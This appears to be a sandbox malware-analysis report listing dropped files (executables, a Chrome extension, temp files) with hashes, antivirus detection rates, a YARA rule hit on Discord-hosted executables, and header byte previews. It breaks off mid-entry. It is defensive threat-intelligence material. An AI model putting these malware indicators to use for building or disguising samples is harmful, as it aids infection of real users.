                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DF3A.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1039
                                                                                                                                                Entropy (8bit):5.365622957937216
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
                                                                                                                                                MD5:AE8CFF33270358D6EC23793128B3EF2F
                                                                                                                                                SHA1:5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
                                                                                                                                                SHA-256:498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
                                                                                                                                                SHA-512:473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                                                                                                                C:\Users\user\AppData\Local\Temp\0faa7aea-12bb-4849-8fa9-815fe14274fd.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .
                                                                                                                                                C:\Users\user\AppData\Local\Temp\1105.tmp
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CBF0.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1622408
                                                                                                                                                Entropy (8bit):6.298350783524153
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:hNZ04UyDzGrVh8xsPCw3/dzcldJndozS35IW1q/kNVSYVEs4j13HLHGJImdV4q:dGrVr3hclvnqzS35IWk/LvRHb0
                                                                                                                                                MD5:BFA689ECA05147AFD466359DD4A144A3
                                                                                                                                                SHA1:B3474BE2B836567420F8DC96512AA303F31C8AFC
                                                                                                                                                SHA-256:B78463B94388FDDB34C03F5DDDD5D542E05CDED6D4E38C6A3588EC2C90F0070B
                                                                                                                                                SHA-512:8F09781FD585A6DFB8BBC34B9F153B414478B44B28D80A8B0BDC3BED687F3ADAB9E60F08CCEC5D5A3FD916E3091C845F9D96603749490B1F7001430408F711D4
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L!y>.@.m.@.m.@.m...l.@.mg$.l.@.mg$.lN@.mg$.l.A.mg$.l.@.mg$.l.@.mg$.m.@.mg$.l.@.mRich.@.m........................PE..L...s<s............!.....,...................P....(K......................................@A.............................&..............8............h...Y.......N..`l..T............................................................................text....).......*.................. ..`RT...........@...................... ..`.data...dW...P.......0..............@....mrdata.h#.......$...>..............@....00cfg...............b..............@..@.rsrc...8............d..............@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):346624
                                                                                                                                                Entropy (8bit):6.008556977987189
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:rwrBNjy106UX1gBXf8fVzu3kkGwSQ46yyZ4AX/cpM0p2a4sqOD06zWusdImyJLiT:0VT1fVzBnKyyH/cKy4sqOIwyy
                                                                                                                                                MD5:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                SHA1:AC6858536F64EC7113F1CD10B248430DA8510DB8
                                                                                                                                                SHA-256:B06B803C1A654849E7B0310B0B590CA574568AB9EBA41858E8CAAFF5DBBEACBA
                                                                                                                                                SHA-512:8C18514C5D43497B5711131B0328CBF7C6ECD51F04A60F421175786C7431B999E30BD5B16FE9345C38FD3E0C26A682A611602A1B2FE657488485246B3BA3B541
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.m.m.m..2m..m...m..m..3mq..m...m...m.m...m..6m...m...m...m...m...mRich.m................PE..L......_......................p..... .............@...........................t......J..........................................d....`s..<....................s.....0...................................@............................................text............................... ..`.data....io.........................@....pale........Ps.....................@....rsrc....<...`s..<..................@..@.reloc...#....s..$...&..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\5b81b21e-8488-49fb-af11-a55e6b006d71.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):248531
                                                                                                                                                Entropy (8bit):7.963657412635355
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                C:\Users\user\AppData\Local\Temp\B096.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512512
                                                                                                                                                Entropy (8bit):7.846723941917503
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Tw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+LF:TVhdLVg2Zep7njXzPDxC+J
                                                                                                                                                MD5:F57B28AEC65D4691202B9524F84CC54A
                                                                                                                                                SHA1:F546B20EB40E3BC2B6929BA0F574E32422CED30C
                                                                                                                                                SHA-256:87D86132095541ED3B5FE05EB06692E1712287B6FFD9832A28EB85F52B55F0A5
                                                                                                                                                SHA-512:1A773186B0A15F743F8D9681036A9ECA45E2DD5F7944725498E929C5438ACFFCD753061EB475383E5759FC41A8ADE4EB717F3D3529313C3C0D48C659B5E36F09
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\B096.exe, Author: Florian Roth
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. .......................@............`.....................................S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........u...p..........HZ..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\BBE1.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22528
                                                                                                                                                Entropy (8bit):5.395556088889033
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:ezekc2D26R7pXha5eglsu2tiP39n+NDr7vGuywqFGc1QzOQslg:qJcMnacgl6Q10rSuywCZ1QO
                                                                                                                                                MD5:787AF677D0C317E8062B9705CB64F951
                                                                                                                                                SHA1:41BF391CE44004A22BA7F18E5FDCDCFCEA73E38F
                                                                                                                                                SHA-256:7CFA3F3EBB7DCE336E24DF02D5BA0FDBC081927892D597986113FB11EDF1702E
                                                                                                                                                SHA-512:8A9BF2D0DF12926F3253DCF5F2B5186928107C36189F404C50C69B67BC09DDA267FACD53E3259ABF3934DE6682BC3B0E49D1D5ACCFA5D4A5B702F4F9EF8D8B45
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\BBE1.exe, Author: Florian Roth
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 22%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..N..........nl... ........@.. ..............................P.....`..................................l..S....................Z............................................................... ............... ..H............text...tL... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B................Pl......H.......PK... ..........................................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):601600
                                                                                                                                                Entropy (8bit):7.082709411162039
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:ZYr2Nn9c+v4tOOc7JMZim3+sKQS4Kwp6vHOZjV1:OrCZSyUimTTwHC
                                                                                                                                                MD5:F0BE69176E592FA1A6345A7090A9EA30
                                                                                                                                                SHA1:CF56A6E67759A06B2681170AF52902FA9CFB9128
                                                                                                                                                SHA-256:28D82936CA3150866022F80B28D5422D66F54FB6FD81321A3E853CE29FAF74FF
                                                                                                                                                SHA-512:D8E1CA5BF558DD0DC1F6281F0970FC7E7E192110315D2F275C0A49FF0CB6F65EB7217C2024FC596A29AD3D1036B51D42A622F39672BC1F0C17ABCECC3122D606
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.m.m.m..2m..m...m..m..3mq..m...m...m.m...m..6m...m...m...m...m...mRich.m................PE..L.....Q_......................p..... .............@...........................x.....zL.........................................d....@w..<....................w.....0...................................@............................................text............................... ..`.data....io.........................@....ruxat.......0w.....................@....rsrc....<...@w..<..................@..@.reloc...#....w..$..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\C295.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):877056
                                                                                                                                                Entropy (8bit):7.462302194895007
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:yYuSM7Gp8zSjQLCV9ibUqyuziiM95BxXEr:yv7i8zSjbVwB1ZM910r
                                                                                                                                                MD5:B79D3399603938A695A98A75DCFBAB91
                                                                                                                                                SHA1:AF9A85F2CC85CD3B040536C988AAB45C237A22D9
                                                                                                                                                SHA-256:934690E391745FCA58CA0DF6D41952D6F58ED7B18AB8FDDA22484B01EB262BE8
                                                                                                                                                SHA-512:5499156CB77B33218077A690AF2EC89D9E9C2AC20796BB2F0A889DD97E569DDD84FDEC0F7C9332523A95D47081235E1BD2240D2971CDD5153CFA906C39BFA0B5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.m.m.m..2m..m...m..m..3mq..m...m...m.m...m..6m...m...m...m...m...mRich.m................PE..L......_......................p..... .............@...........................|.....ja..........................................d.....{..<....................{.....0...................................@............................................text............................... ..`.data....io.........................@....vuci........p{.....................@....rsrc....<....{..<..................@..@.reloc...#....{..$...>..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\C8FE.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):604160
                                                                                                                                                Entropy (8bit):7.081312542094628
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:zUq737aTz5aNquRVgE6/kEObrF5d/WYN4t88+wGOjsyDR:Aq7rwa0uRm8brF5LupDs
                                                                                                                                                MD5:DE692F1B4D4C63FED395BE25E878858E
                                                                                                                                                SHA1:16F5B74E898FB0CD30F127CB1E03DA79E481158A
                                                                                                                                                SHA-256:6ED753E5B9A7AC5D89A6F9749E24C5BEB7483C6FDA2057E81E1EB3ED5A32AB21
                                                                                                                                                SHA-512:24227BBCD1451E7F6A2B6C16637987B1388BE398A88005851AF24805BFD7B57AE39AE7B70E69DE3B424EE48E4FB65EF0CABD710692EBC9393F2A1542E6D8E067
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.>.T.m.T.m.T.m."2m.T.m.".m.T.m."3mqT.m.,.m.T.m.T.m.T.m."6m.T.m.".m.T.m.".m.T.mRich.T.m........PE..L.....*_......................v.....@.............@...........................~......4..........................................d....P}..I....................}..... ...................................@............................................text.............................. ..`.data...H.u.........................@....rsrc....I...P}..J..................@..@.reloc...#....}..$..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\CAC5.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278528
                                                                                                                                                Entropy (8bit):7.390894610588505
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:IdQPlt1M8RJNHUMb62VCDuy1DzJDGLkjNVlZeJjuzbgwuA7ITsq:Ialt6mJN0x2VmlhtawtcjunnF7
                                                                                                                                                MD5:FA00DF47BCC5F9AD16ED71856FB6F4D6
                                                                                                                                                SHA1:561D89B6384A44E6D47AC4B68D04FFFFF3DE3558
                                                                                                                                                SHA-256:B2F5636B2E78B3F60EA53FD0C7C95656E11C08FAC59869B38A165C7BF39CF1E5
                                                                                                                                                SHA-512:3A6ACB14B041B341C979F233D881225615B225DAC9E84F0CD62DAEC69818212A9620AE82E4B61BA5547E3A0EB9D1D8442EF52CE86BF093918203D33DDF3283CE
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......`.....................6......_%............@.............................................................................(....`..H/..............................................................@...............p............................text.............................. ..`.rdata...E.......F..................@..@.data....<..........................@....xoj....r....P......................@..@.rsrc...H/...`...0..................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\CBF0.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):212992
                                                                                                                                                Entropy (8bit):6.734269361613487
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
                                                                                                                                                MD5:73252ACB344040DDC5D9CE78A5D3A4C2
                                                                                                                                                SHA1:3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
                                                                                                                                                SHA-256:B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
                                                                                                                                                SHA-512:1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 80%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\CD17.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):262248
                                                                                                                                                Entropy (8bit):7.344044114091331
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:7Zd5yNguYYTkxcNQoF8KzJugf/vTvN9KQqJIo:7Zd5yNguPQyNQYJuSvDLKXIo
                                                                                                                                                MD5:EDE62358EA39643E43992E9068E03CA2
                                                                                                                                                SHA1:0F73E8F96C01135A91D4E1BFECA139AD31C72C15
                                                                                                                                                SHA-256:187CB817751D6871EB7BE566DD9D9A98A46EDB11391220B69E4FAD695F31E605
                                                                                                                                                SHA-512:552B31EDA2131C8326996DEBA1812C6A6B23D892DDABDD17C3182FCD43B9019CFC863EED1FF67FA2EC21297E98F61502D3E095972D2C6710D08B3F27EA7A82F1
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{a..............0.................. ... ....@.. .......................@............@.................................(...W.......XH..............h.... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...XH.......J..................@..@.reloc....... ......................@..B................d.......H.......................l...."..................................................................?................................?................................?................................?............................................................................................................ .......@........................................................ .......@........................................................ .......@.....................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\D8D0.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):27576
                                                                                                                                                Entropy (8bit):5.969933955399239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:bekc2D26R7pXha5eglsu2CfQG9kyf4ZZK61TEYFGc1QzOQs42Aghgn:bJcMnacgl6EWlXzZ1QO4khgn
                                                                                                                                                MD5:FA6D8115D2266A121FE7C1552C0DDDFD
                                                                                                                                                SHA1:9166433A1F42AE7A623F26341DD9BBED91A045B3
                                                                                                                                                SHA-256:237E9E25B4DADE7BD2CCD0F6D59C9D607EEED8E60C1041F10BE3D4C50B37A459
                                                                                                                                                SHA-512:58825BAF9D243279393A635AEE9E7493682F18105D24CFAAF270BFAE54CB2FFDFE12734D7E3EB34983C554F3599BB73D523029871F28D8AFBF25CD27798C2368
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\D8D0.exe, Author: Florian Roth
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..N...........l... ........@.. ...............................G....`..................................l..O.......,............X............................................................... ............... ..H............text....L... ...N.................. ..`.rsrc...,............P..............@..@.reloc...............V..............@..B.................l......H.......PK..L!..........................................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\DEDC.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):510976
                                                                                                                                                Entropy (8bit):7.850749525333838
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Iw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+W:IVhdLVg2Zep7njXzPDxC+W
                                                                                                                                                MD5:B0A956B96769AA21A44206DD528C5B39
                                                                                                                                                SHA1:30CF20E67DFA3FC38C6E80B761AD0D523C5AF43A
                                                                                                                                                SHA-256:37B78E9A50830B88E97F6048F90EA0AFE925E0C6E4F0E9A1CF3C7849787D9C4C
                                                                                                                                                SHA-512:5B6D8707FA2D4B7D41D7B1733409A34645DF2B42FF064D9E7643A8F4AE7076A798B2012959AF6F8B30E44D60B28EF4B1761E0CB3287448329C9144AE9FD9CE9F
                                                                                                                                                Malicious:false
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\DEDC.exe, Author: Florian Roth
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............N.... ........@.. .......................@......yq....`.....................................K............................ ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H........u..hk..........@Z..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\DF3A.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):161280
                                                                                                                                                Entropy (8bit):5.163359140538006
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hj1+ax5s9jVultxyIAMzTjSMzTjoIe1UhCp:hJqjVoeN
                                                                                                                                                MD5:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                                                                                                                SHA1:6E1ACD6CB17AB64AC6DBF0F4400C649371B0E3BD
                                                                                                                                                SHA-256:08D67F957EC38E92301EEAAAF2759EF2A070376239EAD25864C88F3DD31EAB8C
                                                                                                                                                SHA-512:14A1CD1090A2ECCEA3B654EEE2B7D4DE390219F8C3C200D97D2AB431311BDF24B1B40F2F38E78804AD286654CD33DFB515704C9B863DAF0786A0D633F05C9BF2
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\DF3A.exe, Author: Florian Roth
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 43%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P..l.............. ........@.. ...................................@.....................................O....................x............................................................... ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B.......................H.......(u..t.......A...HL...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...
                                                                                                                                                C:\Users\user\AppData\Local\Temp\E64F.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):791552
                                                                                                                                                Entropy (8bit):7.368824467033047
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:uDMkBTpEvda0f6dSctc54lTQazT6A/9Or+ilw8lCW0k7ro8R3D3INLf3:QMk+dV6dS6KazZ4rPlw8lCWYQi
                                                                                                                                                MD5:7917305400EE899130B1D5B7AFA0A159
                                                                                                                                                SHA1:D45E1A34FE773040D7034A80BBEBB3DBD3EA4252
                                                                                                                                                SHA-256:80C4B12305B41D2FDCD9DCCD53D2414C3AEA2188198F3D79AF262709C1E2DAC9
                                                                                                                                                SHA-512:417DECA0BEEE73B6EA8379B85726A9DAAF4DC32721D7A658BA42B9D359A6739F7478D3E0068C8B110497CB222956A1AFA5E1BF28C202965DEDE7A659EB824EF6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a..........................^..................................Rich...........................PE..L...m;._......................v...................@............................................................................P....0...I.......................... ................................~..@............................................text............................... ..`.data...H.u.........................@....rsrc....I...0...J..................@..@.reloc..8$.......&..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\EBBE.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):348672
                                                                                                                                                Entropy (8bit):5.997778327285649
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:0BbSn3n6QHUKl3hINRqdhUm6b8mCcNebxCg1:Eu3n6UUKlxS2Um6b8mCcNej
                                                                                                                                                MD5:539C39A9565CD4B120E5EB121E45C3C2
                                                                                                                                                SHA1:5E1975A1C8F9B8416D9F5F785882DFB0CC9161DC
